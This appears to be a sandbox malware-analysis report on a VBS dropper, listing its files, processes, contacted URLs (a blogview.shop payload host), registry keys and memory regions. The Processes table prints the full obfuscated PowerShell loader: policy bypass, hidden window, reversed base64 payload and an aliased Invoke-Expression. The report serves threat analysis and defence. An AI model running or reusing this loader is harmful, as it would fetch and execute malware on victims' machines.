Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
FJw9llPHsk.vbs
|
ASCII text, with very long lines (1397), with CRLF, LF line terminators
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eeuyqkc4.bcf.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tatqkyd4.hi5.ps1
|
ASCII text, with no line terminators
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\FJw9llPHsk.vbs"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c $best64code =
'==Qf7kSewJHZkwyJ2g2clJnZlJ3LzVWdsFmdvkGch9Ccvh2cucXZpZ3ZvxmYv8iOzBHd0h2JoEGdhRGZh9GbwVnLrpWdksjNxACclVGbz1CdyFGdztDduVWasNmYldnL0VmbgQ3YlpmYv1ydl5WPrpWdksDMxACclVGbz1CdyFGdztTf7kybkpmYkgyclRXeCRXZH5COmRXV6oTXn5Wak92YuVmL0hXZ05SblR3c5N3W9kHcyRGJd11WlRXeit1On5WayR3ctQXdPxnbihGJ9sybkpmYksjcrpGJggVRJ1jbihGJ7Umbpx0dl5kO60FduVWbu9mcpZnbF5SblR3c5N1WrkCcpRCKzV2czVmckRWQ0N3bIRXZHpjOdNnbE5Cdl5kLtVGdzl3Ub1zKvRmaiRyOn0TPn0zKvRmaiRyOp1WYvh2d98GZqJGJ7V2csVWf7I3aqRCIYVUS9kHcyRGJg0VXbVGd5J2W7lyJ05WZ052bj1Cdld2Jgg2Y0FWbtAicrpGJoYWa7kSbsZGJocmbpJHdTRXZn5COmRXd6oTXn5Wak92YuVmL0hXZ05SblR3c5N3W9I3aqRyepEDI0dWLggGdn5WZM5SbsZGJoYWa7kyYyRyKn8iNoNXZyZWZy9iM3YDN2kTN1UzN5UTM3cDOxcjN48yclVHbhZ3LpBXYvA3boNnL3VWa2d2bsJ2LvozcwRHdodCKhRXYkRWYvxmb39GZusWapRSPtxmZkszJ0hHducCIrASK99FJdJXYoN2WgsHI0NWZqJ2btg2YhVmcvZGI8BSK1EDI4FWbtASNg4Wat1CIt9GZuFmctQXZnBCK05WdvNWLg02bk5WYy1CdldGI8BSK3UjLugDNogCIul2bq1CI9AyYyRyO05WZpx2YiV2duQXZuBCdjVmai9WL3Vmb9sWapRyOxEDIwVWZsNXL0JXY0N3OpMDNggXYt1CI1Aibp1WLg02bk5WYy1CdldGKgAXZlx2ctQnchR3c7kzMgAXZlx2ctQnchR3c'
;$base64 = $best64code.ToCharArray() ; [array]::Reverse($base64) ; -join $base64 2>&1> $null ;$lOadcODE = [sYSTEm.text.eNCoDIng]::UtF8.geTstRiNG([SYStEM.coNvErT]::FRoMBAse64stRInG($BASe64))
;$pwn = 'InV'+'Oke'+'-ex'+'Pre'+'SsI'+'ON' ; NeW-aliAS -nAme pwn -vALUE $pWN -forCe ; pWn $LoaDCode ;
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
https://blogview.shop/api/values/86718771597555964672/refresh6/X
|
unknown
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
https://go.microsoft.co
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
https://blogview.shop/api/values/refresh6
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://blogview.shop/api/values/
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://blogview.shop/api/values/86718771597555964672/refresh6/
|
unknown
|
||
|
https://blogview.shop/api/values/86718771597555964672/refresh6/7045193862.txt
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
https://blogview.shop/api/values/refresh6X
|
unknown
|
||
|
https://blogview.shop
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
There are 9 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
blogview.shop
|
unknown
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
There are 4 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
1421FA0E000
|
trusted library allocation
|
page read and write
|
|
|
|
3B256FE000
|
stack
|
page read and write
|
||
|
7FFD9BAD0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B9C0000
|
trusted library allocation
|
page read and write
|
||
|
14237D70000
|
heap
|
page read and write
|
||
|
1421F785000
|
heap
|
page read and write
|
||
|
1421F715000
|
heap
|
page read and write
|
||
|
142211EE000
|
trusted library allocation
|
page read and write
|
||
|
3B265CE000
|
stack
|
page read and write
|
||
|
1421FD1F000
|
trusted library allocation
|
page read and write
|
||
|
3B2577E000
|
stack
|
page read and write
|
||
|
7FFD9B76D000
|
trusted library allocation
|
page execute and read and write
|
||
|
3B2597D000
|
stack
|
page read and write
|
||
|
1421F75B000
|
heap
|
page read and write
|
||
|
3B257FF000
|
stack
|
page read and write
|
||
|
7FFD9B820000
|
trusted library allocation
|
page execute and read and write
|
||
|
11A8A820000
|
heap
|
page read and write
|
||
|
1422071F000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B91A000
|
trusted library allocation
|
page read and write
|
||
|
1422F997000
|
trusted library allocation
|
page read and write
|
||
|
1421F536000
|
heap
|
page read and write
|
||
|
1421F530000
|
heap
|
page read and write
|
||
|
7FFD9B970000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA00000
|
trusted library allocation
|
page read and write
|
||
|
14237C67000
|
heap
|
page execute and read and write
|
||
|
7FFD9BA50000
|
trusted library allocation
|
page read and write
|
||
|
11A88A55000
|
heap
|
page read and write
|
||
|
13D0AF7000
|
stack
|
page read and write
|
||
|
14237E06000
|
heap
|
page read and write
|
||
|
7FFD9B990000
|
trusted library allocation
|
page read and write
|
||
|
3B2557E000
|
stack
|
page read and write
|
||
|
1422F854000
|
trusted library allocation
|
page read and write
|
||
|
1421DCC0000
|
heap
|
page read and write
|
||
|
3B251EE000
|
stack
|
page read and write
|
||
|
14237DC5000
|
heap
|
page read and write
|
||
|
7FFD9BAA0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B810000
|
trusted library allocation
|
page read and write
|
||
|
14237DC2000
|
heap
|
page read and write
|
||
|
14220E38000
|
trusted library allocation
|
page read and write
|
||
|
1421F7D0000
|
heap
|
page execute and read and write
|
||
|
1421DC80000
|
heap
|
page readonly
|
||
|
1421F680000
|
heap
|
page read and write
|
||
|
142211F4000
|
trusted library allocation
|
page read and write
|
||
|
13D0DFE000
|
stack
|
page read and write
|
||
|
7FFD9B880000
|
trusted library allocation
|
page execute and read and write
|
||
|
3B255FC000
|
stack
|
page read and write
|
||
|
1421FC1C000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B950000
|
trusted library allocation
|
page execute and read and write
|
||
|
3B2567E000
|
stack
|
page read and write
|
||
|
14237C60000
|
heap
|
page execute and read and write
|
||
|
1421DCCE000
|
heap
|
page read and write
|
||
|
1421DC20000
|
heap
|
page read and write
|
||
|
1421F545000
|
heap
|
page read and write
|
||
|
11A88970000
|
heap
|
page read and write
|
||
|
14237BE0000
|
heap
|
page read and write
|
||
|
7FFD9BA80000
|
trusted library allocation
|
page read and write
|
||
|
1422F7E1000
|
trusted library allocation
|
page read and write
|
||
|
1421DADD000
|
heap
|
page read and write
|
||
|
3B2547E000
|
stack
|
page read and write
|
||
|
1422117A000
|
trusted library allocation
|
page read and write
|
||
|
1421DAD7000
|
heap
|
page read and write
|
||
|
1421DA59000
|
heap
|
page read and write
|
||
|
7FFD9B930000
|
trusted library allocation
|
page execute and read and write
|
||
|
1421D9E0000
|
heap
|
page read and write
|
||
|
7FFD9BA70000
|
trusted library allocation
|
page read and write
|
||
|
1421DC70000
|
trusted library allocation
|
page read and write
|
||
|
11A88BE0000
|
heap
|
page read and write
|
||
|
7FFD9B77B000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B980000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B942000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B9D0000
|
trusted library allocation
|
page read and write
|
||
|
1422F7F0000
|
trusted library allocation
|
page read and write
|
||
|
142210D2000
|
trusted library allocation
|
page read and write
|
||
|
1421F866000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B7BC000
|
trusted library allocation
|
page execute and read and write
|
||
|
3B258FE000
|
stack
|
page read and write
|
||
|
7FFD9B846000
|
trusted library allocation
|
page execute and read and write
|
||
|
1421DA00000
|
heap
|
page read and write
|
||
|
13D06FE000
|
stack
|
page read and write
|
||
|
13D05FE000
|
stack
|
page read and write
|
||
|
7FFD9B960000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B763000
|
trusted library allocation
|
page execute and read and write
|
||
|
1421F73F000
|
heap
|
page read and write
|
||
|
1421DA50000
|
heap
|
page read and write
|
||
|
3B25B7E000
|
stack
|
page read and write
|
||
|
11A88990000
|
heap
|
page read and write
|
||
|
7FFD9BA60000
|
trusted library allocation
|
page read and write
|
||
|
3B2587F000
|
stack
|
page read and write
|
||
|
7FFD9BA10000
|
trusted library allocation
|
page read and write
|
||
|
1421F6D4000
|
heap
|
page read and write
|
||
|
11A88A24000
|
heap
|
page read and write
|
||
|
13D0EFB000
|
stack
|
page read and write
|
||
|
7FFD9BA30000
|
trusted library allocation
|
page read and write
|
||
|
13D04FA000
|
stack
|
page read and write
|
||
|
7FFD9B9B0000
|
trusted library allocation
|
page read and write
|
||
|
7DF4E9D10000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9B762000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA40000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA20000
|
trusted library allocation
|
page read and write
|
||
|
14237E18000
|
heap
|
page read and write
|
||
|
1421DC90000
|
trusted library allocation
|
page read and write
|
||
|
1421FD1A000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B9A0000
|
trusted library allocation
|
page read and write
|
||
|
1421DC50000
|
trusted library allocation
|
page read and write
|
||
|
13D0CFE000
|
stack
|
page read and write
|
||
|
7FFD9B9F0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B764000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BAB0000
|
trusted library allocation
|
page read and write
|
||
|
3B25BFB000
|
stack
|
page read and write
|
||
|
7FFD9B816000
|
trusted library allocation
|
page read and write
|
||
|
1421F4A0000
|
trusted library allocation
|
page read and write
|
||
|
1421DA9A000
|
heap
|
page read and write
|
||
|
1421F690000
|
heap
|
page read and write
|
||
|
1421D9D0000
|
heap
|
page read and write
|
||
|
1421DA8F000
|
heap
|
page read and write
|
||
|
3B25A7F000
|
stack
|
page read and write
|
||
|
7FFD9B920000
|
trusted library allocation
|
page execute and read and write
|
||
|
11A88C40000
|
heap
|
page read and write
|
||
|
1421F470000
|
trusted library allocation
|
page read and write
|
||
|
1421DA9E000
|
heap
|
page read and write
|
||
|
13D09FF000
|
stack
|
page read and write
|
||
|
14237DD1000
|
heap
|
page read and write
|
||
|
1421F7E1000
|
trusted library allocation
|
page read and write
|
||
|
13D0BFD000
|
stack
|
page read and write
|
||
|
13D08FE000
|
stack
|
page read and write
|
||
|
3B254FE000
|
stack
|
page read and write
|
||
|
1421F7B0000
|
heap
|
page execute and read and write
|
||
|
3B251A3000
|
stack
|
page read and write
|
||
|
11A88C45000
|
heap
|
page read and write
|
||
|
1421F6D2000
|
heap
|
page read and write
|
||
|
1421DCC5000
|
heap
|
page read and write
|
||
|
7FFD9B911000
|
trusted library allocation
|
page read and write
|
||
|
1421F753000
|
heap
|
page read and write
|
||
|
1422FACE000
|
trusted library allocation
|
page read and write
|
||
|
1421DB47000
|
heap
|
page read and write
|
||
|
7FFD9B81C000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9B900000
|
trusted library allocation
|
page read and write
|
||
|
11A889B0000
|
heap
|
page read and write
|
||
|
7FFD9B780000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA90000
|
trusted library allocation
|
page read and write
|
||
|
14237DFE000
|
heap
|
page read and write
|
||
|
14237E15000
|
heap
|
page read and write
|
||
|
14237C90000
|
heap
|
page read and write
|
||
|
14237DAB000
|
heap
|
page read and write
|
||
|
1421DAB0000
|
heap
|
page read and write
|
||
|
14221348000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BAC0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B770000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B9E0000
|
trusted library allocation
|
page read and write
|
||
|
1421DAD9000
|
heap
|
page read and write
|
||
|
1421FC55000
|
trusted library allocation
|
page read and write
|
||
|
11A88960000
|
heap
|
page read and write
|
There are 142 hidden memdumps, click here to show them.